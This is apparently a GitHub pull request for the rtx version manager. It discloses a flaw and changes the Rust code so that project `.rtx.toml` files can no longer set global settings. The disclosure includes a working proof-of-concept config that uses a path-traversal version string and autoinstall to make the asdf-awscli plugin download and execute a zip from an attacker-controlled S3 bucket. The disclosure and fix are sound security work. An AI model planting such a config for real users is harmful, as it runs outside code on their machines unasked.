Make missing_runtime_behavior a global only settings

Unfortunately, I have realized that requiring `[plugins]` to be trusted as in #728 is likely not enough. Since rtx by default comes with a large set of asdf community plugin definitions, any bug in these plugins can be used to do the same as what's shown in #728. For example, I just randomly picked something I heard of from the first few entries of `rtx p ls-remote` and found a bug:

```
[tools]
awscli = ["1/../../riatre-test-s3-bucket/quite-strange"]

[settings]
missing_runtime_behavior = "autoinstall"
```

Upon on entering the directory with such a `.rtx.toml`, MetricMike/asdf-awscli [downloads](https://github.com/MetricMike/asdf-awscli/blob/2e313965ea2f4654948b816add3dce4233b79385/bin/download#L41) `https://s3.amazonaws.com/aws-cli/awscli-bundle-1/../../riatre-test-s3-bucket/quite-strange.zip` with curl and due to how curl and S3 path style works it normalizes the URI and downloads `https://s3.amazonaws.com/riatre-test-s3-bucket/quite-strange.zip` which is a bucket I control. It then extracts and [executes](https://github.com/MetricMike/asdf-awscli/blob/2e313965ea2f4654948b816add3dce4233b79385/bin/install#L86) `awscli-bundle/install` in the zip file, which does `id > /tmp/uh-oh`

<details><summary>(Note that the example zip file does not contains bin/aws, hence it prints the following error, but you can see that /tmp/uh-oh was created)</summary>

```
asdf-awscli: Expected /home/riatre/.local/share/rtx/installs/awscli/1/../../riatre-test-s3-bucket/quite-st
range/bin/aws to be executable.
asdf-awscli: An error ocurred while installing awscli 1/../../riatre-test-s3-bucket/quite-strange.
rtx awscli@1/../../riatre-test-s3-bucket/quite-strange [ERROR] /home/riatr ✗ 1s rtx ~/.local/share/rtx/plu
gins/awscli/bin/install exited with non-zero status: exit code 1
```
</details>

I can get the bug in asdf-awscli fixed, and to be clear, I think it is fair to call asdf-awscli (and trigger its bug) if I run `rtx install` in the directory with such a `.rtx.toml`, but it doesn't feel right to let a `.rtx.toml` override the `missing_runtime_behavior` to make it completely automatic. In the case of extracting a tarball I don't even have the chance to inspect a `.rtx.toml` before it is executed.

--- a/README.md
+++ b/README.md
@@ -588,9 +588,6 @@ python = {version='3.10', virtualenv='.venv'}
 # note this will only be used if the plugin does not already exist
 python = 'https://github.com/asdf-community/asdf-python'
 
-[settings] # project-local settings
-verbose = true
-
 [alias.node] # project-local aliases
 my_custom_node = '20'
 ```

--- a/src/config/mod.rs
+++ b/src/config/mod.rs
@@ -61,21 +61,12 @@ impl Config {
     }
     pub fn load() -> Result<Self> {
         let global_config = load_rtxrc()?;
+        // TODO: read system config settings
         Settings::add_partial(global_config.settings()?);
-
-        let (config_paths, plugins) = rayon::join(
-            || load_config_paths(&DEFAULT_CONFIG_FILENAMES),
-            load_plugins,
-        );
-        let plugins = plugins?;
-        let config_files =
-            load_all_config_files(&config_paths, &plugins, &BTreeMap::new(), ConfigMap::new())?;
-        for cf in config_files.values() {
-            Settings::add_partial(cf.settings()?);
-        }
         let settings = Settings::try_get()?;
         trace!("Settings: {:#?}", settings);
 
+        let plugins = load_plugins(&settings)?;
         let legacy_files = load_legacy_files(&settings, &plugins);
         let config_filenames = legacy_files
             .keys()
@@ -83,8 +74,7 @@ impl Config {
             .cloned()
             .collect_vec();
         let config_paths = load_config_paths(&config_filenames);
-        let config_files =
-            load_all_config_files(&config_paths, &plugins, &legacy_files, config_files)?;
+        let config_files = load_all_config_files(&config_paths, &plugins, &legacy_files)?;
 
         let (env, env_sources) = load_env(&config_files);
         let repo_urls = config_files.values().flat_map(|cf| cf.plugins()).collect();
@@ -259,9 +249,8 @@ fn load_rtxrc() -> Result<RtxToml> {
     }
 }
 
-fn load_plugins() -> Result<PluginMap> {
+fn load_plugins(settings: &Settings) -> Result<PluginMap> {
     let mut tools = CORE_PLUGINS.clone();
-    let settings = Settings::try_get()?;
     if settings.experimental {
         tools.extend(EXPERIMENTAL_CORE_PLUGINS.clone());
     }
@@ -375,26 +364,19 @@ fn load_all_config_files(
     config_filenames: &[PathBuf],
     tools: &PluginMap,
     legacy_filenames: &BTreeMap<String, Vec<PluginName>>,
-    mut existing: ConfigMap,
 ) -> Result<ConfigMap> {
     Ok(config_filenames
         .iter()
         .unique()
-        .map(|f| (f.clone(), existing.shift_remove(f)))
         .collect_vec()
         .into_par_iter()
-        .map(|(f, existing)| match existing {
-            // already parsed so just return it
-            Some(cf) => Ok((f, cf)),
-            // need to parse this config file
-            None => {
-                let cf = parse_config_file(&f, legacy_filenames, tools)
-                    .wrap_err_with(|| format!("error parsing config file: {}", display_path(&f)))?;
-                if let Err(err) = Tracker::track(&f) {
-                    warn!("tracking config: {err:#}");
-                }
-                Ok((f, cf))
+        .map(|f| {
+            let cf = parse_config_file(f, legacy_filenames, tools)
+                .wrap_err_with(|| format!("error parsing config file: {}", display_path(f)))?;
+            if let Err(err) = Tracker::track(f) {
+                warn!("tracking config: {err:#}");
             }
+            Ok((f.clone(), cf))
         })
         .collect::<Vec<Result<_>>>()
         .into_iter()

--- a/src/plugins/external_plugin.rs
+++ b/src/plugins/external_plugin.rs
@@ -11,6 +11,7 @@ use color_eyre::eyre::{eyre, Result, WrapErr};
 use console::style;
 use itertools::Itertools;
 use once_cell::sync::Lazy;
+use rayon::prelude::*;
 
 use crate::cache::CacheManager;
 use crate::config::{Config, Settings};
@@ -89,7 +90,7 @@ impl ExternalPlugin {
 
     pub fn list() -> Result<Vec<(String, Arc<dyn Plugin>)>> {
         Ok(file::dir_subdirs(&dirs::PLUGINS)?
-            .into_iter()
+            .into_par_iter()
             .map(|name| (name.clone(), Self::newa(name)))
             .collect())
     }

